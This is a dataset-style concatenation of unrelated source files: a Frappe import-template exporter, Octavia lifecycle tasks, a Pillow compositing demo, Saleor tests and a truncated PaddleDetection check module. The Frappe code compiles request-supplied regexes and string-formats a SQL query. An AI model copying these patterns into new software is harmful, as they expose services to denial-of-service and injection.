    "X":re.X,
    "D": re.DEBUG
}
@frappe.whitelist()
def get_template(doctype=None, parent_doctype=None, all_doctypes="No", with_data="No", select_columns=None,
    from_data_import="No", excel_format="No"):
    """Build a Data Import template for ``doctype`` and place it on the response.

    The template is written as CSV (or converted to XLSX when requested via
    ``from_data_import``/``excel_format``) and consists of header metadata,
    column description rows and, when ``with_data == 'Yes'``, the existing
    permitted records. ``doctype`` may also be a two-element list whose second
    item is a filter dict (``op``/``name``/``flags``) restricting which records
    are exported. The result is returned through ``frappe.response``.
    """
    all_doctypes = all_doctypes=="Yes"
    if select_columns:
        select_columns = json.loads(select_columns);
    docs_to_export = {}
    if doctype:
        if isinstance(doctype, string_types):
            doctype = [doctype];
        if len(doctype) > 1:
            # Second list element carries the record-selection filter.
            docs_to_export = doctype[1]
        doctype = doctype[0]
    if not parent_doctype:
        parent_doctype = doctype
    # Maps (doctype, parentfield) -> start/end column indices of its section.
    column_start_end = {}
    if all_doctypes:
        child_doctypes = []
        for df in frappe.get_meta(doctype).get_table_fields():
            child_doctypes.append(dict(doctype=df.options, parentfield=df.fieldname))
    def get_data_keys_definition():
        # Shared key names ("Data Import Template" row labels) used by importer.
        return get_data_keys()
    def add_main_header():
        # Write the fixed header block and usage notes at the top of the file.
        w.writerow([_('Data Import Template')])
        w.writerow([get_data_keys_definition().main_table, doctype])
        if parent_doctype != doctype:
            w.writerow([get_data_keys_definition().parent_table, parent_doctype])
        else:
            w.writerow([''])
        w.writerow([''])
        w.writerow([_('Notes:')])
        w.writerow([_('Please do not change the template headings.')])
        w.writerow([_('First data column must be blank.')])
        w.writerow([_('If you are uploading new records, leave the "name" (ID) column blank.')])
        w.writerow([_('If you are uploading new records, "Naming Series" becomes mandatory, if present.')])
        w.writerow([_('Only mandatory fields are necessary for new records. You can delete non-mandatory columns if you wish.')])
        w.writerow([_('For updating, you can update only selective columns.')])
        w.writerow([_('You can only upload upto 5000 records in one go. (may be less in some cases)')])
        if key == "parent":
            w.writerow([_('"Parent" signifies the parent table in which this row must be added')])
            w.writerow([_('If you are updating, please select "Overwrite" else existing rows will not be deleted.')])
    def build_field_columns(dt, parentfield=None):
        # Append one column section (mandatory fields first) for doctype `dt`.
        meta = frappe.get_meta(dt)
        # build list of valid docfields
        tablecolumns = []
        for f in frappe.db.sql('desc `tab%s`' % dt):
            field = meta.get_field(f[0])
            if field and ((select_columns and f[0] in select_columns[dt]) or not select_columns):
                tablecolumns.append(field)
        tablecolumns.sort(key = lambda a: int(a.idx))
        _column_start_end = frappe._dict(start=0)
        if dt==doctype:
            _column_start_end = frappe._dict(start=0)
        else:
            _column_start_end = frappe._dict(start=len(columns))
        # Synthetic "name"/ID column always leads a section.
        append_field_column(frappe._dict({
            "fieldname": "name",
            "parent": dt,
            "label": "ID",
            "fieldtype": "Data",
            "reqd": 1,
            "idx": 0,
            "info": _("Leave blank for new records")
        }), True)
        for docfield in tablecolumns:
            append_field_column(docfield, True)
        # all non mandatory fields
        for docfield in tablecolumns:
            append_field_column(docfield, False)
        # if there is one column, add a blank column (?)
        if len(columns)-_column_start_end.start == 1:
            append_empty_field_column()
        # append DocType name
        tablerow[_column_start_end.start + 1] = dt
        if parentfield:
            tablerow[_column_start_end.start + 2] = parentfield
        _column_start_end.end = len(columns) + 1
        column_start_end[(dt, parentfield)] = _column_start_end
    def append_field_column(docfield, for_mandatory):
        # Add a single field's metadata to all header rows, subject to filters.
        if not docfield:
            return
        if for_mandatory and not docfield.reqd:
            return
        if not for_mandatory and docfield.reqd:
            return
        if docfield.fieldname in ('parenttype', 'trash_reason'):
            return
        if docfield.hidden:
            return
        if select_columns and docfield.fieldname not in select_columns.get(docfield.parent, []):
            return
        tablerow.append("")
        fieldrow.append(docfield.fieldname)
        labelrow.append(_(docfield.label))
        mandatoryrow.append(docfield.reqd and 'Yes' or 'No')
        typerow.append(docfield.fieldtype)
        inforow.append(getinforow(docfield))
        columns.append(docfield.fieldname)
    def append_empty_field_column():
        # Placeholder column ("~") separating doctype sections.
        tablerow.append("~")
        fieldrow.append("~")
        labelrow.append("")
        mandatoryrow.append("")
        typerow.append("")
        inforow.append("")
        columns.append("")
    def getinforow(docfield):
        """make info comment for options, links etc."""
        if docfield.fieldtype == 'Select':
            if not docfield.options:
                return ''
            else:
                return _("One of") + ': %s' % ', '.join(filter(None, docfield.options.split('\n')))
        elif docfield.fieldtype == 'Link':
            return 'Valid %s' % docfield.options
        elif docfield.fieldtype == 'Int':
            return 'Integer'
        elif docfield.fieldtype == "Check":
            return "0 or 1"
        elif hasattr(docfield, "info"):
            return docfield.info
        else:
            return ''
    def add_field_headings():
        # Flush the accumulated header rows, then the data-separator marker.
        w.writerow(tablerow)
        w.writerow(labelrow)
        w.writerow(fieldrow)
        w.writerow(mandatoryrow)
        w.writerow(typerow)
        w.writerow(inforow)
        w.writerow([get_data_keys_definition().data_separator])
    def add_data():
        # Export existing records (parent plus child rows) when requested.
        def add_data_row(row_group, dt, parentfield, doc, rowidx):
            # Fill one record's values into its doctype's column section.
            d = doc.copy()
            meta = frappe.get_meta(dt)
            if all_doctypes:
                d.name = '"'+ d.name+'"'
            if len(row_group) < rowidx + 1:
                row_group.append([""] * (len(columns) + 1))
            row = row_group[rowidx]
            _column_start_end = column_start_end.get((dt, parentfield))
            if _column_start_end:
                for i, c in enumerate(columns[_column_start_end.start:_column_start_end.end]):
                    df = meta.get_field(c)
                    fieldtype = df.fieldtype if df else "Data"
                    value = d.get(c, "")
                    if value:
                        if fieldtype == "Date":
                            value = formatdate(value)
                        elif fieldtype == "Datetime":
                            value = format_datetime(value)
                    row[_column_start_end.start + i + 1] = value
        if with_data=='Yes':
            frappe.permissions.can_export(parent_doctype, raise_exception=True)
            # sort nested set doctypes by `lft asc`
            order_by = None
            table_columns = frappe.db.get_table_columns(parent_doctype)
            if 'lft' in table_columns and 'rgt' in table_columns:
                order_by = '`tab{doctype}`.`lft` asc'.format(doctype=parent_doctype)
            # get permitted data only
            data = frappe.get_list(doctype, fields=["*"], limit_page_length=None, order_by=order_by)
            for doc in data:
                op = docs_to_export.get("op")
                names = docs_to_export.get("name")
                if names and op:
                    if op == '=' and doc.name not in names:
                        continue
                    elif op == '!=' and doc.name in names:
                        continue
                elif names:
                    try:
                        # Treat `names` as a regex; flag letters come from the
                        # request (see module-level `reflags`).
                        # NOTE(review): '\W+' is an invalid escape under py3
                        # strictness — should be a raw string.
                        sflags = docs_to_export.get("flags", "I,U").upper()
                        flags = 0
                        for a in re.split('\W+',sflags):
                            flags = flags | reflags.get(a,0)
                        c = re.compile(names, flags)
                        m = c.match(doc.name)
                        if not m:
                            continue
                    except:
                        # NOTE(review): bare except silently falls back to exact
                        # matching on any regex error; consider catching
                        # re.error explicitly.
                        if doc.name not in names:
                            continue
                # add main table
                row_group = []
                add_data_row(row_group, doctype, None, doc, 0)
                if all_doctypes:
                    # add child tables
                    for c in child_doctypes:
                        for ci, child in enumerate(frappe.db.sql("""select * from `tab{0}`
                            where parent=%s and parentfield=%s order by idx""".format(c['doctype']),
                            (doc.name, c['parentfield']), as_dict=1)):
                            add_data_row(row_group, c['doctype'], c['parentfield'], child, ci)
                for row in row_group:
                    w.writerow(row)
    w = UnicodeWriter()
    key = 'parent' if parent_doctype != doctype else 'name'
    add_main_header()
    w.writerow([''])
    # Header accumulator rows; one entry per exported column.
    tablerow = [get_data_keys_definition().doctype, ""]
    labelrow = [_("Column Labels:"), "ID"]
    fieldrow = [get_data_keys_definition().columns, key]
    mandatoryrow = [_("Mandatory:"), _("Yes")]
    typerow = [_('Type:'), 'Data (text)']
    inforow = [_('Info:'), '']
    columns = [key]
    build_field_columns(doctype)
    if all_doctypes:
        for d in child_doctypes:
            append_empty_field_column()
            if (select_columns and select_columns.get(d['doctype'], None)) or not select_columns:
                # if atleast one column is selected for this doctype
                build_field_columns(d['doctype'], d['parentfield'])
    add_field_headings()
    add_data()
    if from_data_import == "Yes" and excel_format == "Yes":
        # Round-trip the CSV through a temp file to produce an XLSX workbook.
        # NOTE(review): the file is re-opened in text mode without an explicit
        # encoding — confirm behaviour for non-ASCII data on py3.
        filename = frappe.generate_hash("", 10)
        with open(filename, 'wb') as f:
            f.write(cstr(w.getvalue()).encode("utf-8"))
        f = open(filename)
        reader = csv.reader(f)
        from frappe.utils.xlsxutils import make_xlsx
        xlsx_file = make_xlsx(reader, "Data Import Template")
        f.close()
        os.remove(filename)
        # write out response as a xlsx type
        frappe.response['filename'] = doctype + '.xlsx'
        frappe.response['filecontent'] = xlsx_file.getvalue()
        frappe.response['type'] = 'binary'
    else:
        # write out response as a type csv
        frappe.response['result'] = cstr(w.getvalue())
        frappe.response['type'] = 'csv'
        frappe.response['doctype'] = doctype
| 29.535714
| 123
| 0.68682
|
4a0a145c6d95f55c0e473ec051b4317d40735ee7
| 25
|
py
|
Python
|
scavenger/api/scraper/__init__.py
|
Gulats/scavenger
|
ba8a712a60ae9f4f4ebdbc8111369c9a5954aa05
|
[
"MIT"
] | null | null | null |
scavenger/api/scraper/__init__.py
|
Gulats/scavenger
|
ba8a712a60ae9f4f4ebdbc8111369c9a5954aa05
|
[
"MIT"
] | 4
|
2019-01-28T17:47:31.000Z
|
2019-01-28T17:56:25.000Z
|
scavenger/api/scraper/__init__.py
|
Gulats/scavenger
|
ba8a712a60ae9f4f4ebdbc8111369c9a5954aa05
|
[
"MIT"
] | null | null | null |
from .controller import *
| 25
| 25
| 0.8
|
4a0a148fde8709574e0dfb3084815e0d3c424ca6
| 7,126
|
py
|
Python
|
octavia/controller/worker/v2/tasks/lifecycle_tasks.py
|
johnsom/octavia
|
41c628a084002017d2003926cf0e25ba3ffeee0c
|
[
"Apache-2.0"
] | null | null | null |
octavia/controller/worker/v2/tasks/lifecycle_tasks.py
|
johnsom/octavia
|
41c628a084002017d2003926cf0e25ba3ffeee0c
|
[
"Apache-2.0"
] | null | null | null |
octavia/controller/worker/v2/tasks/lifecycle_tasks.py
|
johnsom/octavia
|
41c628a084002017d2003926cf0e25ba3ffeee0c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 Rackspace
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from taskflow import task
from octavia.common import constants
from octavia.controller.worker import task_utils as task_utilities
class BaseLifecycleTask(task.Task):
    """Base class providing the helpers shared by all lifecycle checkpoint tasks."""

    def __init__(self, **kwargs):
        # Utility object subclasses use to flip provisioning statuses on revert.
        self.task_utils = task_utilities.TaskUtils()
        super().__init__(**kwargs)
class AmphoraIDToErrorOnRevertTask(BaseLifecycleTask):
    """Task to checkpoint Amphora lifecycle milestones."""
    # Forward path is a no-op; on revert the amphora (by ID) is marked ERROR.

    def execute(self, amphora_id):
        pass

    def revert(self, amphora_id, *args, **kwargs):
        self.task_utils.mark_amphora_status_error(amphora_id)
class AmphoraToErrorOnRevertTask(AmphoraIDToErrorOnRevertTask):
    """Checkpoint task marking an amphora dict's amphora as ERROR on revert."""

    def execute(self, amphora):
        # No forward work; this task exists solely for its revert behaviour.
        pass

    def revert(self, amphora, *args, **kwargs):
        # Delegate to the ID-based parent using the amphora's own ID.
        super().revert(amphora.get(constants.ID))
class HealthMonitorToErrorOnRevertTask(BaseLifecycleTask):
    """Mark a health monitor ERROR on revert.

    The monitor's pool record is flagged ERROR, while the pool, load balancer
    and all listeners are returned to ACTIVE provisioning status.
    """

    def execute(self, health_mon, listeners, loadbalancer):
        # Forward path intentionally does nothing.
        pass

    def revert(self, health_mon, listeners, loadbalancer, *args, **kwargs):
        pool_id = health_mon[constants.POOL_ID]
        self.task_utils.mark_health_mon_prov_status_error(pool_id)
        self.task_utils.mark_pool_prov_status_active(pool_id)
        self.task_utils.mark_loadbalancer_prov_status_active(
            loadbalancer[constants.LOADBALANCER_ID])
        for lsnr in listeners:
            self.task_utils.mark_listener_prov_status_active(
                lsnr[constants.LISTENER_ID])
class L7PolicyToErrorOnRevertTask(BaseLifecycleTask):
    """Mark an L7 policy ERROR on revert; related objects return to ACTIVE."""

    def execute(self, l7policy, listeners, loadbalancer_id):
        # Forward path intentionally does nothing.
        pass

    def revert(self, l7policy, listeners, loadbalancer_id, *args, **kwargs):
        policy_id = l7policy[constants.L7POLICY_ID]
        self.task_utils.mark_l7policy_prov_status_error(policy_id)
        self.task_utils.mark_loadbalancer_prov_status_active(loadbalancer_id)
        for lsnr in listeners:
            self.task_utils.mark_listener_prov_status_active(
                lsnr[constants.LISTENER_ID])
class L7RuleToErrorOnRevertTask(BaseLifecycleTask):
    """Mark an L7 rule ERROR on revert; related objects return to ACTIVE."""

    def execute(self, l7rule, l7policy_id, listeners, loadbalancer_id):
        # Forward path intentionally does nothing.
        pass

    def revert(self, l7rule, l7policy_id, listeners, loadbalancer_id, *args,
               **kwargs):
        rule_id = l7rule[constants.L7RULE_ID]
        self.task_utils.mark_l7rule_prov_status_error(rule_id)
        self.task_utils.mark_l7policy_prov_status_active(l7policy_id)
        self.task_utils.mark_loadbalancer_prov_status_active(loadbalancer_id)
        for lsnr in listeners:
            self.task_utils.mark_listener_prov_status_active(
                lsnr[constants.LISTENER_ID])
class ListenerToErrorOnRevertTask(BaseLifecycleTask):
    """Mark a single listener ERROR on revert; its load balancer goes ACTIVE."""

    def execute(self, listener):
        # Forward path intentionally does nothing.
        pass

    def revert(self, listener, *args, **kwargs):
        listener_id = listener[constants.LISTENER_ID]
        lb_id = listener[constants.LOADBALANCER_ID]
        self.task_utils.mark_listener_prov_status_error(listener_id)
        self.task_utils.mark_loadbalancer_prov_status_active(lb_id)
class ListenersToErrorOnRevertTask(BaseLifecycleTask):
    """Mark a group of listeners ERROR on revert; their LB goes ACTIVE."""

    def execute(self, listeners):
        # Forward path intentionally does nothing.
        pass

    def revert(self, listeners, *args, **kwargs):
        for lsnr in listeners:
            self.task_utils.mark_listener_prov_status_error(
                lsnr[constants.LISTENER_ID])
        # All listeners share one load balancer; use the first entry's ID.
        self.task_utils.mark_loadbalancer_prov_status_active(
            listeners[0][constants.LOADBALANCER_ID])
class LoadBalancerIDToErrorOnRevertTask(BaseLifecycleTask):
    """Task to set the load balancer to ERROR on revert."""
    # Forward path is a no-op; on revert the LB (by ID) is marked ERROR.

    def execute(self, loadbalancer_id):
        pass

    def revert(self, loadbalancer_id, *args, **kwargs):
        self.task_utils.mark_loadbalancer_prov_status_error(loadbalancer_id)
class LoadBalancerToErrorOnRevertTask(LoadBalancerIDToErrorOnRevertTask):
    """Mark a load balancer dict's LB as ERROR on revert."""

    def execute(self, loadbalancer):
        # No forward work; this task exists solely for its revert behaviour.
        pass

    def revert(self, loadbalancer, *args, **kwargs):
        # Delegate to the ID-based parent using the load balancer's own ID.
        super().revert(loadbalancer[constants.LOADBALANCER_ID])
class MemberToErrorOnRevertTask(BaseLifecycleTask):
    """Mark a member ERROR on revert; listeners, pool and LB return to ACTIVE."""

    def execute(self, member, listeners, loadbalancer, pool_id):
        # Forward path intentionally does nothing.
        pass

    def revert(self, member, listeners, loadbalancer, pool_id, *args,
               **kwargs):
        self.task_utils.mark_member_prov_status_error(
            member[constants.MEMBER_ID])
        for lsnr in listeners:
            self.task_utils.mark_listener_prov_status_active(
                lsnr[constants.LISTENER_ID])
        self.task_utils.mark_pool_prov_status_active(pool_id)
        self.task_utils.mark_loadbalancer_prov_status_active(
            loadbalancer[constants.LOADBALANCER_ID])
class MembersToErrorOnRevertTask(BaseLifecycleTask):
    """Mark a batch of members ERROR on revert; related objects go ACTIVE."""

    def execute(self, members, listeners, loadbalancer, pool_id):
        # Forward path intentionally does nothing.
        pass

    def revert(self, members, listeners, loadbalancer, pool_id, *args,
               **kwargs):
        for member in members:
            self.task_utils.mark_member_prov_status_error(
                member[constants.MEMBER_ID])
        for lsnr in listeners:
            self.task_utils.mark_listener_prov_status_active(
                lsnr[constants.LISTENER_ID])
        self.task_utils.mark_pool_prov_status_active(pool_id)
        self.task_utils.mark_loadbalancer_prov_status_active(
            loadbalancer[constants.LOADBALANCER_ID])
class PoolToErrorOnRevertTask(BaseLifecycleTask):
    """Mark a pool ERROR on revert; its LB and listeners return to ACTIVE."""

    def execute(self, pool_id, listeners, loadbalancer):
        # Forward path intentionally does nothing.
        pass

    def revert(self, pool_id, listeners, loadbalancer, *args, **kwargs):
        self.task_utils.mark_pool_prov_status_error(pool_id)
        self.task_utils.mark_loadbalancer_prov_status_active(
            loadbalancer[constants.LOADBALANCER_ID])
        for lsnr in listeners:
            self.task_utils.mark_listener_prov_status_active(
                lsnr[constants.LISTENER_ID])
| 35.809045
| 78
| 0.706147
|
4a0a14b74a646966a85dd8cb054088bedb640a9b
| 1,495
|
py
|
Python
|
notebook/pillow_composite.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 174
|
2018-05-30T21:14:50.000Z
|
2022-03-25T07:59:37.000Z
|
notebook/pillow_composite.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 5
|
2019-08-10T03:22:02.000Z
|
2021-07-12T20:31:17.000Z
|
notebook/pillow_composite.py
|
vhn0912/python-snippets
|
80b2e1d6b2b8f12ae30d6dbe86d25bb2b3a02038
|
[
"MIT"
] | 53
|
2018-04-27T05:26:35.000Z
|
2022-03-25T07:59:37.000Z
|
from PIL import Image, ImageDraw, ImageFilter

# Demo: composite two images through a variety of masks and save each result.
base_img = Image.open('data/src/lena.jpg')
overlay_img = Image.open('data/src/rocket.jpg').resize(base_img.size)
overlay_img.save('data/src/rocket_resize.jpg')

# 1) Uniform 50% blend: a solid grey mask (alternative: Image.blend(..., 0.5)).
solid_mask = Image.new("L", base_img.size, 128)
blended = Image.composite(base_img, overlay_img, solid_mask)
blended.save('data/dst/pillow_composite_solid.jpg', quality=95)

# 2) Hard-edged circular cut-out of the base image over the overlay.
circle_mask = Image.new("L", base_img.size, 0)
ImageDraw.Draw(circle_mask).ellipse((140, 50, 260, 170), fill=255)
circled = Image.composite(base_img, overlay_img, circle_mask)
circled.save('data/dst/pillow_composite_circle.jpg', quality=95)

# 3) Same circle, but feathered via Gaussian blur of the mask.
soft_mask = circle_mask.filter(ImageFilter.GaussianBlur(10))
feathered = Image.composite(base_img, overlay_img, soft_mask)
feathered.save('data/dst/pillow_composite_circle_blur.jpg', quality=95)

# 4) Arbitrary image used as a greyscale mask (silhouette).
shape_mask = Image.open('data/src/horse.png').convert('L').resize(base_img.size)
shaped = Image.composite(base_img, overlay_img, shape_mask)
shaped.save('data/dst/pillow_composite_horse.jpg', quality=95)

# 5) Horizontal gradient mask for a left-to-right cross-fade.
gradient_mask = Image.open('data/src/gradation_h.jpg').convert('L').resize(base_img.size)
faded = Image.composite(base_img, overlay_img, gradient_mask)
faded.save('data/dst/pillow_composite_gradation.jpg', quality=95)
| 31.145833
| 76
| 0.751839
|
4a0a15c30b5fa16a23c26288a535b29fea9aa1f6
| 8,936
|
py
|
Python
|
saleor/product/tests/test_generate_and_set_variant_name.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 15,337
|
2015-01-12T02:11:52.000Z
|
2021-10-05T19:19:29.000Z
|
saleor/product/tests/test_generate_and_set_variant_name.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 7,486
|
2015-02-11T10:52:13.000Z
|
2021-10-06T09:37:15.000Z
|
saleor/product/tests/test_generate_and_set_variant_name.py
|
fairhopeweb/saleor
|
9ac6c22652d46ba65a5b894da5f1ba5bec48c019
|
[
"CC-BY-4.0"
] | 5,864
|
2015-01-16T14:52:54.000Z
|
2021-10-05T23:01:15.000Z
|
from decimal import Decimal
from unittest.mock import MagicMock, Mock
import pytest
from ...attribute import AttributeInputType
from ...attribute.models import AttributeValue
from ...attribute.utils import associate_attribute_values_to_instance
from ...product import ProductTypeKind
from ...product.models import ProductVariantChannelListing
from ..models import Product, ProductType, ProductVariant
from ..tasks import _update_variants_names
from ..utils.variants import generate_and_set_variant_name
@pytest.fixture()
def variant_with_no_attributes(category, channel_USD):
    """Create a variant having no attributes, the same for the parent product."""
    product_type = ProductType.objects.create(
        name="Test product type",
        has_variants=True,
        is_shipping_required=True,
        kind=ProductTypeKind.NORMAL,
    )
    product = Product.objects.create(
        name="Test product",
        product_type=product_type,
        category=category,
    )
    variant = ProductVariant.objects.create(product=product, sku="123")
    # Give the variant a USD channel listing so price-dependent code paths work.
    ProductVariantChannelListing.objects.create(
        variant=variant,
        channel=channel_USD,
        cost_price_amount=Decimal(1),
        price_amount=Decimal(10),
        currency=channel_USD.currency_code,
    )
    return variant
def test_generate_and_set_variant_name_different_attributes(
    variant_with_no_attributes, color_attribute_without_values, size_attribute
):
    """Test the name generation from a given variant containing multiple attributes and
    different input types (dropdown and multiselect).
    """
    variant = variant_with_no_attributes
    color_attribute = color_attribute_without_values
    # Assign the attributes to the product type; only the size attribute is
    # flagged as a variant-selection attribute.
    variant.product.product_type.variant_attributes.add(
        size_attribute, through_defaults={"variant_selection": True}
    )
    variant.product.product_type.variant_attributes.add(color_attribute)
    # Set the color attribute to a multi-value attribute
    color_attribute.input_type = AttributeInputType.MULTISELECT
    color_attribute.save(update_fields=["input_type"])
    # Create colors
    colors = AttributeValue.objects.bulk_create(
        [
            AttributeValue(attribute=color_attribute, name="Yellow", slug="yellow"),
            AttributeValue(attribute=color_attribute, name="Blue", slug="blue"),
            AttributeValue(attribute=color_attribute, name="Red", slug="red"),
        ]
    )
    # Retrieve the size attribute value "Big"
    size = size_attribute.values.get(slug="big")
    # Associate the colors and size to variant attributes
    associate_attribute_values_to_instance(variant, color_attribute, *tuple(colors))
    associate_attribute_values_to_instance(variant, size_attribute, size)
    # Generate the variant name from the attributes
    generate_and_set_variant_name(variant, variant.sku)
    variant.refresh_from_db()
    # Only the variant-selection attribute (size) contributes to the name.
    assert variant.name == "Big"
def test_generate_and_set_variant_name_only_variant_selection_attributes(
    variant_with_no_attributes, color_attribute_without_values, size_attribute
):
    """Test the name generation for a given variant containing multiple attributes
    with input types allowed in variant selection.
    """
    variant = variant_with_no_attributes
    color_attribute = color_attribute_without_values
    # Assign the attributes to the product type
    variant.product.product_type.variant_attributes.set(
        (color_attribute, size_attribute), through_defaults={"variant_selection": True}
    )
    # Create values
    colors = AttributeValue.objects.bulk_create(
        [
            AttributeValue(
                attribute=color_attribute, name="Yellow", slug="yellow", sort_order=1
            ),
            AttributeValue(
                attribute=color_attribute, name="Blue", slug="blue", sort_order=2
            ),
            AttributeValue(
                attribute=color_attribute, name="Red", slug="red", sort_order=3
            ),
        ]
    )
    # Retrieve the size attribute value "Big"
    size = size_attribute.values.get(slug="big")
    size.sort_order = 4
    size.save(update_fields=["sort_order"])
    # Associate the colors and size to variant attributes
    associate_attribute_values_to_instance(variant, color_attribute, *tuple(colors))
    associate_attribute_values_to_instance(variant, size_attribute, size)
    # Generate the variant name from the attributes
    generate_and_set_variant_name(variant, variant.sku)
    variant.refresh_from_db()
    # Attributes are joined with " / "; a multi-value attribute lists its
    # values comma-separated.
    assert variant.name == "Big / Yellow, Blue, Red"
def test_generate_and_set_variant_name_only_not_variant_selection_attributes(
    variant_with_no_attributes, color_attribute_without_values, file_attribute
):
    """Test the name generation for a given variant containing multiple attributes
    with input types not allowed in variant selection.
    """
    variant = variant_with_no_attributes
    color_attribute = color_attribute_without_values
    # Assign the attributes to the product type
    variant.product.product_type.variant_attributes.set(
        (color_attribute, file_attribute)
    )
    # Set the color attribute to a multi-value attribute
    color_attribute.input_type = AttributeInputType.MULTISELECT
    color_attribute.save(update_fields=["input_type"])
    # Create values
    values = AttributeValue.objects.bulk_create(
        [
            AttributeValue(attribute=color_attribute, name="Yellow", slug="yellow"),
            AttributeValue(attribute=color_attribute, name="Blue", slug="blue"),
            AttributeValue(
                attribute=file_attribute,
                name="test_file_3.txt",
                slug="test_file3txt",
                file_url="http://mirumee.com/test_media/test_file3.txt",
                content_type="text/plain",
            ),
        ]
    )
    # Associate the colors and size to variant attributes
    associate_attribute_values_to_instance(variant, color_attribute, *values[:2])
    associate_attribute_values_to_instance(variant, file_attribute, values[-1])
    # Generate the variant name from the attributes
    generate_and_set_variant_name(variant, variant.sku)
    variant.refresh_from_db()
    # No variant-selection attribute is assigned, so the name falls back to SKU.
    assert variant.name == variant.sku
def test_generate_name_from_values_empty(variant_with_no_attributes):
    """A variant with no attribute values assigned falls back to its SKU."""
    no_attr_variant = variant_with_no_attributes
    generate_and_set_variant_name(no_attr_variant, no_attr_variant.sku)
    no_attr_variant.refresh_from_db()
    assert no_attr_variant.name == no_attr_variant.sku
def test_product_type_update_changes_variant_name(product):
    """Renaming an attribute value propagates into the variant name."""
    expected = "test_name"
    variant = product.variants.first()
    assert variant.name != expected
    attr = product.product_type.variant_attributes.first()
    value = attr.values.first()
    value.name = expected
    value.save()
    _update_variants_names(product.product_type, [attr])
    variant.refresh_from_db()
    assert variant.name == expected
def test_only_not_variant_selection_attr_left_variant_name_change_to_sku(product):
    """When the only attribute stops being a variant-selection attribute,
    the regenerated variant name falls back to the SKU."""
    new_name = "test_name"
    product_variant = product.variants.first()
    assert not product_variant.name == new_name
    attribute = product.product_type.variant_attributes.first()
    # Drop the attribute from variant selection and make it multi-valued,
    # so it can no longer contribute to the generated variant name.
    variant_attribute = attribute.attributevariant.get()
    variant_attribute.variant_selection = False
    variant_attribute.save(update_fields=["variant_selection"])
    attribute.input_type = AttributeInputType.MULTISELECT
    attribute.save(update_fields=["input_type"])
    _update_variants_names(product.product_type, [attribute])
    product_variant.refresh_from_db()
    assert product_variant.name == product_variant.sku
def test_update_variants_changed_does_nothing_with_no_attributes():
    """With no variant attributes, the rename task is a silent no-op."""
    mocked_type = MagicMock(spec=ProductType)
    mocked_type.variant_attributes.all = Mock(return_value=[])
    # FIXME: This method no longer returns any value
    assert _update_variants_names(mocked_type, []) is None
def test_only_not_variant_selection_attr_left_variant_name_change_to_global_id(product):
    """Like the SKU fallback, but with sku=None the regenerated variant name
    falls back to the variant's global ID instead."""
    new_name = "test_name"
    product_variant = product.variants.first()
    assert not product_variant.name == new_name
    # Remove the SKU so the next fallback (global ID) is exercised.
    product_variant.sku = None
    product_variant.save()
    attribute = product.product_type.variant_attributes.first()
    attribute.input_type = AttributeInputType.MULTISELECT
    variant_attribute = attribute.attributevariant.get()
    variant_attribute.variant_selection = False
    variant_attribute.save(update_fields=["variant_selection"])
    attribute.save(update_fields=["input_type"])
    _update_variants_names(product.product_type, [attribute])
    product_variant.refresh_from_db()
    assert product_variant.name == product_variant.get_global_id()
| 38.188034
| 88
| 0.743733
|
4a0a17638f49bf892dcf0ff25cf0d2a63c5404fd
| 3,465
|
py
|
Python
|
paddlers/models/ppdet/utils/check.py
|
huilin16/PaddleRS
|
ca0d6223d8e56cd3bd3cbd3a033c89f1718ce26a
|
[
"Apache-2.0"
] | 40
|
2022-02-28T02:07:28.000Z
|
2022-03-31T09:54:29.000Z
|
paddlers/models/ppdet/utils/check.py
|
wondering516/PaddleRS
|
b6f7033f3c0ca7bc6952456c0a0f53eef6c1c07f
|
[
"Apache-2.0"
] | 5
|
2022-03-15T12:13:33.000Z
|
2022-03-31T15:54:08.000Z
|
paddlers/models/ppdet/utils/check.py
|
wondering516/PaddleRS
|
b6f7033f3c0ca7bc6952456c0a0f53eef6c1c07f
|
[
"Apache-2.0"
] | 20
|
2022-02-28T02:07:31.000Z
|
2022-03-31T11:40:40.000Z
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import paddle
import six
import paddle.version as fluid_version
from .logger import setup_logger
# Module-level logger shared by every check helper below.
logger = setup_logger(__name__)
# Explicit public API of this module.
__all__ = ['check_gpu', 'check_npu', 'check_version', 'check_config']
def check_npu(use_npu):
    """
    Log error and exit when set use_npu=true in paddlepaddle
    cpu/gpu/xpu version.

    Args:
        use_npu (bool): whether the config requested NPU execution.
    """
    err = "Config use_npu cannot be set as true while you are " \
          "using paddlepaddle cpu/gpu/xpu version ! \nPlease try: \n" \
          "\t1. Install paddlepaddle-npu to run model on NPU \n" \
          "\t2. Set use_npu as false in config file to run " \
          "model on CPU/GPU/XPU"
    try:
        if use_npu and not paddle.is_compiled_with_npu():
            logger.error(err)
            # sys.exit raises SystemExit (a BaseException), so it is NOT
            # swallowed by the broad `except Exception` below.
            sys.exit(1)
    except Exception:
        # Best-effort probe: some Paddle builds may not expose
        # is_compiled_with_npu(); skip the check instead of failing.
        pass
def check_gpu(use_gpu):
    """
    Log error and exit when set use_gpu=true in paddlepaddle
    cpu version.

    Args:
        use_gpu (bool): whether the config requested GPU execution.
    """
    err = "Config use_gpu cannot be set as true while you are " \
          "using paddlepaddle cpu version ! \nPlease try: \n" \
          "\t1. Install paddlepaddle-gpu to run model on GPU \n" \
          "\t2. Set use_gpu as false in config file to run " \
          "model on CPU"
    try:
